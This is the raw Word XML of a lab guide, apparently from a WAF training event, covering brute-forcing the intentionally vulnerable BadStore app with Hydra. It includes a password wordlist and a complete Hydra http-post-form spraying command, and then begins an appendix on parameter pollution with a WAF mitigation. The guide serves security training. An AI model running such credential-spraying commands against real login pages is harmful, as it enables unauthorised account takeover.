            <wp:extent cx="2213162" cy="756164"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="119255084" name="Picture 119255084" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 119255084"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R759704582ee04a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13162" cy="756164"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="21B1CB40" w:rsidRDefault="326B0EE2" w14:paraId="2B27E095" w14:textId="5890042A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4F3D2AAD">
        <w:drawing>
          <wp:inline wp14:editId="33B12C4A" wp14:anchorId="68377C0C">
            <wp:extent cx="1054139" cy="1054139"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="844788593" name="" descr="Stop photos, royalty-free images, graphics, vectors &amp; videos | Adobe Stock" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rb2632b9442d74f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54139" cy="1054139"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="5E3B81E8" w14:textId="095BF033">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="7D220FD8" w14:textId="684B8C9E">
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="6E1A2BF4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Advanced – Requires Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="16B0A0BD" w14:textId="71B47EC5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Using Hydra to spray credentials and do </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>perform</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Credential </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Stuffing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="03B0BD49" w14:textId="68510610">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We will be using Hydra to execute our attack. Hydra is an authentication brute-forcing tool that can be used for many protocols and services. It can help us automate our password spraying attack</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="6451A132">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="51F98274" w14:textId="2489045A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Installing Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="21A7D75E" w14:textId="22F355FD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>First, let’s install Hydra. If you are using Kali Linux, a version of Hydra is already installed. Otherwise, you can run this command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="26DD2D99" w14:textId="782605DF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> apt-get install </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="30FA3E5C" w14:textId="25EBF2EC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Preparing wordlists</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="147F78EC" w14:textId="718A9F86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you start spraying for passwords, you </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="6F0EABE4">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="4A4690D9">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> collect a list of usernames and a list of passwords to use.</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="22CC0BD1">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> For this demo – we will just use admin as the username. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="15ED96AE" w14:textId="5C2FCC34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="7B33A86D" w14:textId="36AC532F">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>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 xml:space="preserve">Create a Txt file using a list of passwords – name it </w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hydra_passwords.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="4E9ED90A" w14:textId="69F2E6FA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="6FB11917" w14:textId="73CB76AD">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BADSTORE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="0F665C12" w14:textId="07AA6D59">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secret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="3D78BE7D" w14:textId="68A30453">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bad_store</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="736F9B48" w14:textId="759DA3E6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="off" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="32F6121D" w:rsidR="58C8E6FA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>verybad_store</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="0C7CDF58" w14:textId="746A327B">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BADSTOREBADSTOREBADSTORE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="526937B0" w14:textId="3DEFD4AD">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admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="79552B71" w14:textId="5A18DE48">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password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="1174427E" w14:textId="3E7CA3F2">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administrator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="4B666C58" w14:textId="3622B6A9">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hello</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="32F6121D" w:rsidRDefault="326B0EE2" w14:paraId="6D3BF991" w14:textId="0C3FCA07">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secret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32F6121D" w:rsidP="32F6121D" w:rsidRDefault="32F6121D" w14:paraId="26404982" w14:textId="0DCD63F6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="6B2071E7" w14:textId="3D964665">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Attacking Badstore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="682DD73A" w14:textId="38241D71">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra </w:t>
      </w:r>
      <w:hyperlink r:id="Rfa309458df8b4bb7">
        <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:strike w:val="0"/>
            <w:dstrike w:val="0"/>
            <w:noProof w:val="0"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>badstore.cudathon.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="378CAE52">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="1D1C1D"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -s 80 http-post-form "/cgi-bin/badstore.cgi?action=login:email=^USER^&amp;passwd=^PASS^:Error" -l admin -P ./hydra_passwords.txt  -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="700A78AE" w14:textId="0361693E">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="326B0EE2" w:rsidP="1FEADC78" w:rsidRDefault="326B0EE2" w14:paraId="1E2D375B" w14:textId="651D3768">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="326B0EE2">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="1FEADC78">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="1A3BB3AD">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>APPENDIX A</w:t>
      </w:r>
      <w:r w:rsidRPr="1FEADC78" w:rsidR="63688FC7">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Attack Examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A3BB3AD" w:rsidP="699639B3" w:rsidRDefault="727384C8" w14:paraId="7D0605EC" w14:textId="410A83DF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="03C3DADA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Parameter Pollution</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A3BB3AD" w:rsidP="699639B3" w:rsidRDefault="727384C8" w14:paraId="2448FD7F" w14:textId="2FCDD0F3">
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>badstore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> app is written so </w:t>
      </w:r>
      <w:r w:rsidR="5B293A83">
        <w:rPr/>
        <w:t>poorly</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="543E6342">
        <w:rPr/>
        <w:t xml:space="preserve">the shopping cart </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>actually relies</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> on the same parameter being </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>submitted</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0E67FACB">
        <w:rPr/>
        <w:t xml:space="preserve">multiple times </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>with multiple values</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">This leads to big problems, for example </w:t>
      </w:r>
      <w:r w:rsidR="24081CAE">
        <w:rPr/>
        <w:t>(see</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0BFBF224">
        <w:rPr/>
        <w:t>below)</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve">Therefore, it is </w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t>not uncommon</w:t>
      </w:r>
      <w:r w:rsidR="727384C8">
        <w:rPr/>
        <w:t xml:space="preserve"> to use the WAF to limit the maximum number of instances of the same parameters to 1 in any single request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1A3BB3AD" w:rsidP="699639B3" w:rsidRDefault="727384C8" w14:paraId="76B2EC3A" w14:textId="261ED39C">
      <w:r w:rsidR="727384C8">
        <w:drawing>
          <wp:inline wp14:editId="37A4E711" wp14:anchorId="0797B31C">
            <wp:extent cx="5943600" cy="3524250"/>
